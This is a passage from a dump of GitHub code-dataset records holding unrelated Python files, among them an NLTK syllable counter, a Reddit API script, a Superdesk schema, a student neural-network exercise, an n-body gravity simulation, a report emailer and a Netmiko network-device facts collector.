{expected}\")","repo_name":"tung491/algo-expert-2021","sub_path":"array/min_rewards/min_rewards.py","file_name":"min_rewards.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21153820546","text":"import nltk, re, string\n\n\ndef normalization(user_input):\n \"\"\" Remove punctuation and tokenize the text \"\"\"\n \n regex = re.compile('[%s]' % re.escape(string.punctuation))\n user_input = regex.sub('', user_input)\n return user_input.split()\n\n\ndef two_syllable_words():\n \"\"\" Find two-syllable words in CMU Pronouncing Dictionary \"\"\"\n \n entries = nltk.corpus.cmudict.entries()\n # a syllable must contain a vowel, the following list contains all different vowel sounds\n vowels = re.compile(r'AA|AE|AH|AO|AW|AX|AXR|AY|EH|ER|EY|IH|IX|IY|OW|OY|UH|UW|UX|AX-H')\n \n words = []\n for word in entries:\n phon_count = 0\n for phon in word[1]:\n if re.match(vowels, phon): # if the phon is a vowel\n phon_count += 1\n if phon_count == 2: # if there are two vowels in the word, append it to a list\n words.append(word[0])\n \n return words\n\n\ndef main():\n user_input = input(\"Enter English text: \").lower()\n user_input = normalization(user_input)\n two_syllable = two_syllable_words()\n matches = [w for w in user_input if w in two_syllable]\n print(\"Following two-syllable words were found:\", end=' ')\n print(', '.join(w for w in matches))\n\n\nmain()\n\n","repo_name":"majosaurus/uni-garbage","sub_path":"machine_learning/01_06_homework.py","file_name":"01_06_homework.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23597352074","text":"#!/usr/bin/python3\n\"\"\"Queries the Reddit API\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"returns first 10 posts from Reddit API\"\"\"\n\n url = \"https://www.reddit.com/r/\" + subreddit + \"/hot.json?limit=10\"\n header = {\"User-Agent\": \"Test\"}\n r = requests.get(url, headers=header)\n if r.status_code == 200:\n for item in r.json().get(\"data\", None).get(\"children\", None):\n print(item.get(\"data\", None).get(\"title\", None))\n else:\n print(None)\n\n\nif __name__ == \"__main__\":\n top_ten('programing')\n","repo_name":"luiseduardiazc/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25210324494","text":"from superdesk.resource import Resource\n\nfrom .enums import ConceptNature\n\n\nCONCEPT_ITEMS_PRIVELEGE = \"concept_items\"\n\n\nclass ConceptItemsResource(Resource):\n \"\"\"Concept item schema\"\"\"\n\n schema = {\n \"name\": {\"type\": \"string\", \"required\": True, \"empty\": False},\n \"group_id\": {\"type\": \"string\", \"required\": False, \"empty\": False, \"readonly\": False},\n \"definition_text\": {\"type\": \"string\", \"required\": False, \"empty\": False, \"readonly\": True},\n \"definition_html\": {\"type\": \"string\", \"required\": True, \"empty\": False},\n \"language\": {\"type\": \"string\", \"required\": True, \"empty\": False},\n \"labels\": {\"type\": \"list\", \"schema\": {\"type\": \"string\"}, \"unique_list\": True},\n # http://cv.iptc.org/newscodes/cpnature/\n \"cpnat_type\": {\"type\": \"string\", \"required\": True, \"allowed\": ConceptNature.values()},\n # https://iptc.org/std/NewsML-G2/guidelines/#more-real-world-entities\n \"properties\": {\"type\": \"dict\", \"required\": False},\n \"created_by\": Resource.rel(\"users\", embeddable=False, readonly=True),\n \"updated_by\": Resource.rel(\"users\", embeddable=False, readonly=True),\n # system fields\n \"_type\": {\"type\": \"string\"},\n }\n privileges = {\n \"PATCH\": CONCEPT_ITEMS_PRIVELEGE,\n \"PUT\": CONCEPT_ITEMS_PRIVELEGE,\n \"DELETE\": CONCEPT_ITEMS_PRIVELEGE,\n }\n item_url = 'regex(\"[a-f0-9]{24}\")'\n resource_methods = [\"GET\", \"POST\"]\n item_methods = [\"GET\", \"PATCH\", \"PUT\", \"DELETE\"]\n query_objectid_as_string = False\n mongo_indexes = {\n \"name_collation\": ([(\"name\", 1)], {\"collation\": {\"locale\": \"en\", \"strength\": 1}}),\n \"definition_text_collation\": (\n [\n (\"definition_text\", 1),\n ],\n {\"collation\": {\"locale\": \"en\", \"strength\": 1}},\n ),\n \"group_id\": ([(\"group_id\", 1), (\"language\", 1)], {\"unique\": True}),\n }\n","repo_name":"superdesk/superdesk-core","sub_path":"apps/concept_items/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"81"} +{"seq_id":"28586887641","text":"from flask import Flask, render_template, request\nimport sqlite3\nimport json\n\napp = Flask('__name__')\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/createevent')\ndef createevent(methods=['GET', 'POST']):\n\n name = request.args.get('name')\n print(name)\n\n link = request.args.get('link')\n print(link)\n\n starttime = request.args.get('starttime')\n print(starttime)\n\n conn = sqlite3.connect('database/events.db')\n\n cursorcurrentid = conn.execute(\"SELECT currentID from CURRENT\")\n for row in cursorcurrentid:\n print(\"CurrentID is \", row[0])\n currentId = str(row[0])\n\n conn.execute(\"\"\"INSERT INTO EVENTS (id, name, link, starttime) \\\n VALUES (?, ?, ?, ?)\"\"\", (currentId, name, link, starttime))\n\n newcurrentid = str(int(currentId) + 1)\n conn.execute(\"UPDATE CURRENT set currentID = ? where currentID = ?\",\n (newcurrentid, currentId))\n\n conn.commit()\n conn.close()\n\n return 'thisreturnstatementdoesntmatter'\n\n@app.route('/getEvents')\ndef getEvents(methods=['GET', 'POST']):\n conn = sqlite3.connect('database/events.db')\n cursor = conn.execute(\"SELECT id, name, link, starttime from EVENTS\")\n\n jsonSerializableEvents = []\n\n for eventRow in cursor:\n jsonSerializableEvents.append(eventRow)\n\n dumpedEvents = json.dumps(jsonSerializableEvents)\n loadedEvents = json.loads(dumpedEvents)\n\n conn.close()\n\n return str(loadedEvents)\n\n\nif __name__ == '__main__':\n # ! Remove debug = True after development\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"theamazing0/hackja-main","sub_path":"keep-on-track-server/keepOnTrackServer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24939360711","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 21 14:25:13 2019\n\n@author: farhan\n\"\"\"\n\nimport numpy as np\nimport sys\nimport random\n\n# our nonlinear function (and its derivative); lam = 1 (so fixed)\ndef sigmoid(x, derive=False):\n if derive:\n return x * (1 - x)\n return 1 / (1 + np.exp(-x))\n###################################################################################################################3\ndef tanh(x, derive=False):\n if derive:\n return (1 - x*x)\n return (np.exp(2*x)-1) / (1 + np.exp(2*x))\n###################################################################################################################\n#Mean Squared Error\ndef msqe(d,y,derive=False):\n if derive == True:\n return -1*(d-y)\n return 0.5 * (d-y)*(d-y)\n###################################################################################################################\n\n\n# define the XOR data set\nX =np.array([\n [0.0, 0.0, 0.8, 0.4, 0.4, 0.1, 0.0, 0.0, 0.0],\n [0.0, 0.3, 0.3, 0.8, 0.3, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.3, 0.3, 0.8, 0.3, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.8, 0.4, 0.4, 0.1],\n [0.8, 0.4, 0.4, 0.1, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.3, 0.3, 0.8, 0.3]])\n\n # its labels\ny = np.array([\n [-1],\n [1],\n [1],\n [-1],\n [-1],\n [1]])\n\n# learning rate\neta = 0.2\n\n# initialize weights with random numbers\n#n1_w = np.random.normal(0,1,(3, 1))\n#n2_w = np.random.normal(0,1,(3, 1))\n#n3_w = np.random.normal(0,1,(3, 1))\n\nn1_w = green_ = np.array([1.73673761, 1.89791391, -2.10677342, -0.14891209, 0.58306155])\n\nn2_w = orange_ = np.array([-2.25923303, 0.13723954, -0.70121322, -0.62078008, -0.47961976])\n\nn3_w = wout_ = np.array([1.20973877, -1.07518386, 0.80691921, -0.29078347, -0.22094764, -0.16915604, 1.10083444, 0.08251052, \n -0.00437558, -1.72255825, 1.05755642, -2.51791281, -1.91064012])\n\n###############################################\n# Epochs\n###############################################\nepoch = 1 #1000 # how many epochs? (each epoch will pass all 4 data points through)\nerr = np.zeros((epoch,1)) # lets record error to plot (get a convergence plot)\ninds = np.asarray([0,1,2,3,4,5]) # array of our 4 indices (data point index references)\nfor k in range(1): \n \n # init error\n err[k] = 0 \n \n # random shuffle of data each epoch\n \n #inds = np.random.permutation(inds)\n \n for i in range(4): \n \n # what index?\n inx = inds[i]\n \n # forward pass\n v = np.ones((12, 1))\n \n for i in range (6):\n v[i] = np.dot(X[i:i+4],n1_w[0:4])+n1_w[4]\n v[i] = tanh[v[i]]\n for i in range (6,12):\n v[i] = np.dot(X[i-6:i-6+4],n2_w[0:4])+n2_w[4]\n v[i] = tanh[v[i]]\n \n \n #v[0] = np.dot(X[inx,:], n1_w) # neuron 1 fires (x as input)\n #v[0] = tanh(v[0]) # neuron 1 sigmoid\n #v[1] = np.dot(X[inx,:], n2_w) # neuron 2 fires (x as input)\n #v[1] = sigmoid(v[1]) \n \n oo = np.dot(np.transpose(v), n3_w) # neuron 3 fires, taking neuron 1 and 2 as input\n o = tanh(oo) # hey, result of our net!!!\n \n # error\n err[k] = err[k] + ((1.0/2.0) * np.power((o - y[inx]), 2.0))\n \n # backprop time!!!\n \n # output layer\n delta_1 = o - y[inx]\n delta_2 = tanh(o,derive=True)\n # now, lets prop it back to the weights\n delta_ow = np.ones((13, 1))\n # format is\n # delta_index = (input to final neuron) * (Err derivative * Sigmoid derivative)\n \n for l in range(12):\n delta_ow[l] = v[l] * (delta_1*delta_2)\n \n delta_ow[12] = 1 * (delta_1*delta_2)\n \n #delta_ow[0] = v[0] * (delta_1*delta_2)\n #delta_ow[1] = v[1] * (delta_1*delta_2)\n #delta_ow[2] = v[2] * (delta_1*delta_2)\n #print(v[2])\n \n \n # neuron n1\n \n #delta_3 = tanh(v[0],derive=True)\n delta_n = np.ones((12,1))\n delta_n = delta_n.squeeze()\n \n for l in range(12): #neuron n1 to n12\n delta_n[l] = tanh(v[l],derive=True)\n \n # same, need to prop back to weights\n delta_hw1 = np.zeros((5, 1))\n # format\n # input this Tanh der error from output weight to output neuron\n for l in range(4):\n for m in range(6):\n delta_hw1[l] = X[inx,l+m] * delta_n[m] * ((delta_1*delta_2) *n3_w[m])\n \n #for j in range(4):\n # for i in range (6):\n # delta_green[j] += X[j+i] * tanh(V_tanh[i], True) * delta_Ey * delta_yv * wout[i]\n # delta_orange[j] += X[j+i] * tanh(V_tanh[i+6], True) * delta_Ey * delta_yv * wout[i+6]\n \n #delta_hw1[0] = X[inx,0] * delta_n[] * ((delta_1*delta_2) *n3_w[0])\n #delta_hw1[1] = X[inx,1] * delta_n[] * ((delta_1*delta_2) *n3_w[0])\n #delta_hw1[2] = X[inx,2] * delta_n[] * ((delta_1*delta_2) *n3_w[0]) \n \n # neuron n2\n delta_4 = sigmoid(v[1],derive=True)\n # same, need to prop back to weights \n delta_hw2 = np.ones((5, 1))\n delta_hw2[0] = X[inx,0] * delta_4 * ((delta_1*delta_2) *n3_w[1])\n delta_hw2[1] = X[inx,1] * delta_4 * ((delta_1*delta_2) *n3_w[1])\n delta_hw2[2] = X[inx,2] * delta_4 * ((delta_1*delta_2) *n3_w[1])\n \n # update rule, so old value + eta weighted version of delta's above!!!\n n1_w = n1_w - eta * delta_hw1\n n2_w = n2_w - eta * delta_hw2\n n3_w = n3_w - eta * delta_ow\n ","repo_name":"farhanquadir/Project_Compilation","sub_path":"NN_Class/NN_Shared_weights.py","file_name":"NN_Shared_weights.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36198237344","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# import mpl_toolkits.mplot3d.axes3d as p3\nimport matplotlib.animation as animation\nfrom scipy.integrate import odeint\n\nG = 6.67430 * 10**(-11) # gravitational constant\nc = 299792458.0 # speed of light\nAU = 1.495978707 * 10**11 # astronomical unit\nMSun = 1.98847 * 10**30 # solar mass\nyr = 31556952 # year\n\n# function which returns derivative at given time\ndef func_r_v_dot(r_v,t,N_obj,m): # r_v (positions and velocities) and m (masses) should numpy arrays\n r_v = np.array(r_v) # shape (N_obj*6)\n m = np.array(m)\n\n r_v_dot = np.zeros((N_obj,6))\n\n assert r_v.shape == (N_obj*6,)\n assert m.shape == (N_obj,)\n\n r_v = np.reshape(r_v,(N_obj,6)) # shape N_obj X 6\n\n for i in range(N_obj):\n r_i = r_v[i,0:3]\n v_i = r_v[i,3:6]\n m_i = m[i]\n a_i = np.zeros(3)\n for j in range(N_obj):\n if i!=j:\n r_j = r_v[j,0:3]\n v_j = r_v[j,3:6]\n m_j = m[j]\n r_ij = r_i-r_j\n r_ij_norm = np.linalg.norm(r_ij)\n a_ij_0 = -G*m_j*r_ij/r_ij_norm**3 # Newtonian acceleration\n a_ij_1 = 0 # 1PN term\n a_ij_25 = 0 # 2.5PN term\n a_i = a_i + a_ij_0 + a_ij_1/c**2 + a_ij_25/c**5\n r_v_dot[i,0:3] = v_i\n r_v_dot[i,3:6] = a_i\n\n r_v_dot = np.reshape(r_v_dot,(N_obj*6)) # shape (N_obj*6)\n return r_v_dot\n\n# function which returns adaptive time-steps\ndef func_adapt_dt(r_v,N_obj,m): # r_v (positions and velocities) and m (masses) should numpy arrays\n r_v = np.array(r_v) # shape (N_obj*6)\n m = np.array(m)\n eps = 0\n\n dt = yr # standard time-step\n\n assert r_v.shape == (N_obj*6,)\n assert m.shape == (N_obj,)\n\n r_v = np.reshape(r_v,(N_obj,6)) # shape N_obj X 6\n\n for i in range(N_obj):\n r_i = r_v[i,0:3]\n v_i = r_v[i,3:6]\n m_i = m[i]\n for j in range(N_obj):\n if i!=j:\n r_j = r_v[j,0:3]\n v_j = r_v[j,3:6]\n m_j = m[j]\n r_ij = r_i-r_j+eps \n v_ij = v_i-v_j\n r_ij_norm = np.linalg.norm(r_ij)\n v_ij_norm = np.linalg.norm(v_ij)\n a_ij_norm = G*m_j/r_ij_norm**2\n if v_ij_norm == 0 and a_ij_norm != 0:\n dt_min = np.sqrt(r_ij_norm/a_ij_norm)\n elif v_ij_norm != 0 and a_ij_norm == 0:\n dt_min = r_ij_norm/v_ij_norm\n elif v_ij_norm != 0 and a_ij_norm != 0:\n dt_min = min([r_ij_norm/v_ij_norm,np.sqrt(r_ij_norm/a_ij_norm)]) # approximate timescale which needs to be resolved\n else:\n dt_min = dt\n if dt_min < dt:\n dt = dt_min\n return dt\n\n# binary\n# gifsave = \"binary.gif\"\n# min_xyz,max_xyz = -150,150\n# N_obj = 2\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([10,30])*MSun\n# e_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\n# r_12 = 80*AU\n# v_12 = np.sqrt(G*np.sum(m[0:2])/r_12)\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [0,r_12*m[1]/np.sum(m),0]\n# r_v_0[3:6] = [e_fac*v_12*m[1]/np.sum(m),0,0]\n# r_v_0[6:9] = [0,-r_12*m[0]/np.sum(m),0]\n# r_v_0[9:12] = [- e_fac*v_12*m[0]/np.sum(m),0,0]\n\n\n# triple\ngifsave = \"triple.gif\"\nmin_xyz,max_xyz = -150,150\nN_obj = 3\n# m = np.ones(N_obj)*10*MSun\nm = np.array([30,10,20])*MSun\ne_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\nr_12 = 15*AU\nv_12 = np.sqrt(G*np.sum(m[0:2])/r_12)\nr_in12_3 = 100*AU\nv_in12_3 = np.sqrt(G*np.sum(m)/r_in12_3)\nr_v_0 = np.zeros(N_obj*6)\nr_v_0[0:3] = [0, r_in12_3*(m[2]/np.sum(m)), r_12*(m[1]/np.sum(m[0:2]))]\nr_v_0[3:6] = [e_fac*v_in12_3*(m[2]/np.sum(m)) + e_fac*v_12*(m[1]/np.sum(m[0:2])), 0, 0]\nr_v_0[6:9] = [0, r_in12_3*(m[2]/np.sum(m)), - r_12*(m[0]/np.sum(m[0:2]))]\nr_v_0[9:12] = [e_fac*v_in12_3*(m[2]/np.sum(m)) - e_fac*v_12*(m[0]/np.sum(m[0:2])), 0, 0]\nr_v_0[12:15] = [0, - r_in12_3*(np.sum(m[0:2])/np.sum(m)), 0]\nr_v_0[15:18] = [- e_fac*v_in12_3*(np.sum(m[0:2])/np.sum(m)), 0, 0]\n\n\n# 2+2 quadruple\n# gifsave = \"2+2_quadruple.gif\"\n# min_xyz,max_xyz = -150,150\n# N_obj = 4\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([40,20,30,10])*MSun\n# e_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\n# r_12 = 10*AU\n# v_12 = np.sqrt(G*np.sum(m[0:2])/r_12)\n# r_34 = 10*AU\n# v_34 = np.sqrt(G*np.sum(m[2:4])/r_34)\n# r_in12_in34 = 100*AU\n# v_in12_in34 = np.sqrt(G*np.sum(m)/r_in12_in34)\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [0, r_in12_in34*(np.sum(m[2:4])/np.sum(m)), r_12*(m[1]/np.sum(m[0:2]))]\n# r_v_0[3:6] = [e_fac*v_in12_in34*(np.sum(m[2:4])/np.sum(m)) + e_fac*v_12*(m[1]/np.sum(m[0:2])), 0, 0]\n# r_v_0[6:9] = [0, r_in12_in34*(np.sum(m[2:4])/np.sum(m)), - r_12*(m[0]/np.sum(m[0:2]))]\n# r_v_0[9:12] = [e_fac*v_in12_in34*(np.sum(m[2:4])/np.sum(m)) - e_fac*v_12*(m[0]/np.sum(m[0:2])), 0, 0]\n# r_v_0[12:15] = [0, - r_in12_in34*(np.sum(m[0:2])/np.sum(m)), r_34*(m[3]/np.sum(m[2:4]))]\n# r_v_0[15:18] = [- e_fac*v_in12_in34*(np.sum(m[0:2])/np.sum(m)) + e_fac*v_34*(m[3]/np.sum(m[2:4])), 0, 0]\n# r_v_0[18:21] = [0, - r_in12_in34*(np.sum(m[0:2])/np.sum(m)), - r_34*(m[2]/np.sum(m[2:4]))]\n# r_v_0[21:24] = [- e_fac*v_in12_in34*(np.sum(m[0:2])/np.sum(m)) - e_fac*v_34*(m[2]/np.sum(m[2:4])), 0, 0]\n\n\n# 3+1 quadruple\n# gifsave = \"3+1_quadruple.gif\"\n# min_xyz,max_xyz = -500,500\n# N_obj = 4\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([40,10,30,20])*MSun\n# e_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\n# r_12 = 20*AU\n# v_12 = np.sqrt(G*np.sum(m[0:2])/r_12)\n# r_in12_3 = 80*AU\n# v_in12_3 = np.sqrt(G*np.sum(m[0:3])/r_in12_3)\n# r_mid123_4 = 350*AU\n# v_mid123_4 = np.sqrt(G*np.sum(m)/r_mid123_4)\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [r_in12_3*(m[2]/np.sum(m[0:3])), r_mid123_4*(m[3]/np.sum(m)), r_12*(m[1]/np.sum(m[0:2]))]\n# r_v_0[3:6] = [e_fac*v_mid123_4*(m[3]/np.sum(m)) + e_fac*v_12*(m[1]/np.sum(m[0:2])), 0, e_fac*v_in12_3*(m[2]/np.sum(m[0:3]))]\n# r_v_0[6:9] = [r_in12_3*(m[2]/np.sum(m[0:3])), r_mid123_4*(m[3]/np.sum(m)), - r_12*(m[0]/np.sum(m[0:2]))]\n# r_v_0[9:12] = [e_fac*v_mid123_4*(m[3]/np.sum(m)) - e_fac*v_12*(m[0]/np.sum(m[0:2])), 0, e_fac*v_in12_3*(m[2]/np.sum(m[0:3]))]\n# r_v_0[12:15] = [- r_in12_3*(np.sum(m[0:2])/np.sum(m[0:3])), r_mid123_4*(m[3]/np.sum(m)), 0]\n# r_v_0[15:18] = [e_fac*v_mid123_4*(m[3]/np.sum(m)), 0, - e_fac*v_in12_3*(np.sum(m[0:2])/np.sum(m[0:3]))]\n# r_v_0[18:21] = [0, - r_mid123_4*(np.sum(m[0:3])/np.sum(m)), 0]\n# r_v_0[21:24] = [- e_fac*v_mid123_4*(np.sum(m[0:3])/np.sum(m)), 0, 0]\n\n# Pythagorean 3-body\n# gifsave = \"pythagorean.gif\"\n# min_xyz,max_xyz = -50,50\n# N_obj = 3\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([3.0,4.0,5.0])*MSun\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [10.0*AU , 30.0*AU , 0.0*AU]\n# r_v_0[3:6] = [0.0 , 0.0 , 0.0]\n# r_v_0[6:9] = [-20.0*AU , -10.0*AU , 0.0*AU]\n# r_v_0[9:12] = [0.0 , 0.0 , 0.0]\n# r_v_0[12:15] = [10.0*AU , -10.0*AU , 0.0*AU]\n# r_v_0[15:18] = [0.0 , 0.0 , 0.0]\n\n\nN_steps = 1000\n\nt = np.zeros(N_steps+1)\nr_v_total = np.zeros((N_steps+1,N_obj,6)) # stores positions and velocities after each time-step\nr_v_total[0,:,:] = np.reshape(r_v_0,(N_obj,6))\n\nr_v_evolve = r_v_0 # position and velocity at a given evolution time\nfor step in range(N_steps):\n dt_evolve = func_adapt_dt(r_v_evolve,N_obj,m)\n r_v_evolve = odeint(func_r_v_dot,r_v_evolve,[0,dt_evolve],args=(N_obj,m))[1] # shape 1 X (N_obj*6) -- (0th element is not relevant)\n\n t[step+1] = t[step]+dt_evolve\n r_v_total[step+1,:,:] = np.reshape(r_v_evolve,(N_obj,6))\n\nprint(t[-1]/yr,\"yr evolution time\")\n\nplt.style.use('dark_background')\n\nfig = plt.figure(figsize=(10,10))\n# ax = p3.Axes3D(fig,auto_add_to_figure=False)\n# fig.add_axes(ax)\nax = fig.add_subplot(projection='3d')\nax.grid(None)\nax.w_xaxis.pane.fill = False\nax.w_yaxis.pane.fill = False\nax.w_zaxis.pane.fill = False\n\ntrajectories = [ax.plot([],[],[],lw=1,alpha=0.7,color='C%d'%(i))[0] for i in range(N_obj)]\nparticles = [ax.plot([],[],[],'o',markersize=np.sqrt(m[i]/MSun)*2,color='C%d'%(i))[0] for i in range(N_obj)]\nax.set_title('t = %.0f yr'%(t[0]/yr),fontsize=25)\n\n# function to update matplotlib plot for each frame\ndef animate(t_step,N_obj,r_v,trajectories,particles,t):\n for i in range(N_obj):\n r = r_v[0:t_step+1,i,0:3]/AU # shape * X 3\n\n ax.set_title('t = %.0f yr'%(t[t_step]/yr),fontsize=25)\n\n trajectories[i].set_data(r[:,0],r[:,1]) # X and Y axes\n trajectories[i].set_3d_properties(r[:,2]) # Z axis\n\n particles[i].set_data(r[t_step:t_step+1,0],r[t_step:t_step+1,1]) # X and Y axes\n particles[i].set_3d_properties(r[t_step:t_step+1,2]) # Z axis\n\n# animate N_steps frames with interval 1ms between frames\nanim = animation.FuncAnimation(fig, animate, frames=N_steps+1, fargs=(N_obj,r_v_total,trajectories,particles,t), interval=1, blit=False)\n\n# ax.view_init(azim=90, elev=0)\nax.set_xlim3d([min_xyz,max_xyz])\nax.set_xlabel('X [AU]',fontsize=15)\nax.set_ylim3d([min_xyz,max_xyz])\nax.set_ylabel('Y [AU]',fontsize=15)\nax.set_zlim3d([min_xyz,max_xyz])\nax.set_zlabel('Z [AU]',fontsize=15)\n\nplt.show()\nanim.save('./gif/%s'%(gifsave))\n\n# CONVERT GIF TO MP4\n# ffmpeg -r 50 -i anim.gif anim.mp4","repo_name":"cheyanneshariat/OSPE_Scripts","sub_path":"nbody.py","file_name":"nbody.py","file_ext":"py","file_size_in_byte":9108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2197947298","text":"'''\nScript to process supplier fruit description data from \nsupplier-data/descriptions directory. \n'''\n\nimport os\nimport datetime\nimport reports\nimport emails\n\nfolder = \"supplier-data/descriptions/\"\nattachment = \"/tmp/processed.pdf\"\n\ndef main():\n # Process the data\n date = datetime.datetime.now()\n report_title = \"Processed Update on {} {}, {}\".format(\n date.strftime(\"%d\"), date.strftime(\"%B\"), date.strftime(\"%Y\"))\n paragraph = {}\n for file in os.listdir(folder):\n lines = open(folder + file, 'r').read().splitlines()\n paragraph[lines[0].strip()] = lines[1].strip()\n # Generate Pdf\n reports.generate_report(attachment, report_title, paragraph)\n # Send the email\n sender = \"automation@example.com\"\n receiver = \"{}@example.com\".format(os.environ.get('USER'))\n body = \"All fruits are uploaded to our website successfully. A detailed list is attached to this email.\"\n subject = \"Upload Completed - Online Fruit Store\"\n message = emails.generate_email(attachment, sender, receiver, body, subject)\n emails.send_email(message)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Asra2000/Quicklab-Course6","sub_path":"lab4/report_email.py","file_name":"report_email.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29697957255","text":"\r\nimport app.Modules.connection as ConnectWith\r\nimport app.base.routes as Credentials\r\nimport app.Database.DbOperations as DbOps\r\nfrom netmiko import ConnectHandler, ssh_exception\r\nimport csv\r\n\r\nsession = None\r\n\r\ndef send_command(command, expect_string=None):\r\n \"\"\"Send Netmiko commands\"\"\"\r\n\r\n get_response = None\r\n\r\n retries = 0\r\n while retries != 3:\r\n try:\r\n get_response = session.send_command(command)\r\n break\r\n except (OSError, TypeError, AttributeError, ssh_exception.NetmikoTimeoutException):\r\n retries += 1\r\n\r\n return get_response\r\n\r\n\r\ndef get_serial_model(session_obj):\r\n \"\"\"Get device serial number and model\"\"\"\r\n\r\n global session\r\n\r\n session = session_obj\r\n serial = None\r\n model = None\r\n\r\n show_inventory = send_command('show inventory')\r\n\r\n for i in show_inventory.splitlines():\r\n\r\n if i.rfind('Chassis') != -1:\r\n model = i.split(\"\\\"\")[3].split(' ')[1]\r\n elif i.rfind('NAME') != -1:\r\n model = i.split(\"\\\"\")[1]\r\n\r\n if i.rfind('SN') != -1:\r\n serial = i.split('SN: ')[1]\r\n break\r\n\r\n return serial, model\r\n\r\n\r\ndef get_uptime_software(session_obj):\r\n \"\"\"Get device uptime and software\"\"\"\r\n\r\n global session\r\n\r\n session = session_obj\r\n uptime = None\r\n software = None\r\n show_version = send_command('show version')\r\n\r\n for i in show_version.splitlines():\r\n if i.rfind('Uptime') != -1:\r\n uptime = i.split(\"is\")[2]\r\n break\r\n elif i.rfind('RELEASE SOFTWARE') != -1:\r\n software = i\r\n\r\n return uptime, software\r\n\r\ndef import_csv_bulk(path, filename):\r\n \"\"\"Parse data from csv file upload, write to database devicefacts_front_end table\"\"\"\r\n\r\n with open(path) as file:\r\n for row_id, row in enumerate(csv.reader(file)):\r\n if row_id != 0:\r\n try:\r\n netmiko_session = ConnectWith.creat_netmiko_connection(row[1], row[2], row[0], row[3])\r\n serial_model = get_serial_model(netmiko_session)\r\n uptime_software = get_uptime_software(netmiko_session)\r\n update_facts = DbOps.update_device_facts(row[0], serial_model[0], serial_model[1], uptime_software[0],\r\n uptime_software[1], row[1], row[2], row[3], row[4])\r\n except IndexError:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cober2019/IOS-XE-Ops","sub_path":"XEOpsDatabase/app/Modules/GetFacts.py","file_name":"GetFacts.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"16766285209","text":"import string\n\nfile_contents = \"In the control room was silence like fabric strained to \\\n the verge oftearing. Softly through the weave of it came the murmur of \\\n the engines, fretful, unhappy, the whimper of something sick.\"\n\ndef calculate_frequencies(file_contents):\n # Here is a list of punctuations and uninteresting words you can use to process your text\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n uninteresting_words = [\"the\", \"a\", \"to\", \"if\", \"is\", \"it\", \"of\", \"and\", \"or\", \"an\", \"as\", \"i\", \"me\", \"my\", \\\n \"we\", \"our\", \"ours\", \"you\", \"your\", \"yours\", \"he\", \"she\", \"him\", \"his\", \"her\", \"hers\", \"its\", \"they\", \"them\", \\\n \"their\", \"what\", \"which\", \"who\", \"whom\", \"this\", \"that\", \"am\", \"are\", \"was\", \"were\", \"be\", \"been\", \"being\", \\\n \"have\", \"has\", \"had\", \"do\", \"does\", \"did\", \"but\", \"at\", \"by\", \"with\", \"from\", \"here\", \"when\", \"where\", \"how\", \\\n \"all\", \"any\", \"both\", \"each\", \"few\", \"more\", \"some\", \"such\", \"no\", \"nor\", \"too\", \"very\", \"can\", \"will\", \"just\"]\n\n # LEARNER CODE START HERE\n words = file_contents.lower().split()\n words = [''.join(c for c in s if c not in string.punctuation) for s in words]\n words = [''.join(c for c in s if c not in uninteresting_words) for s in words]\n\n print(words)\n # frequency = [words.count(i) for i in words]\n\ncalculate_frequencies(file_contents)","repo_name":"jstoveld/pylearning","sub_path":"final project/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43827957064","text":"from typing import Iterable\n\nimport numpy as np\nfrom edugrad.optim import Optimizer, SGD\nfrom edugrad.tensor import Tensor\n\nclass Adagrad(Optimizer):\n\n def __init__(self, params: Iterable[Tensor], lr: float = 1e-2):\n super(Adagrad, 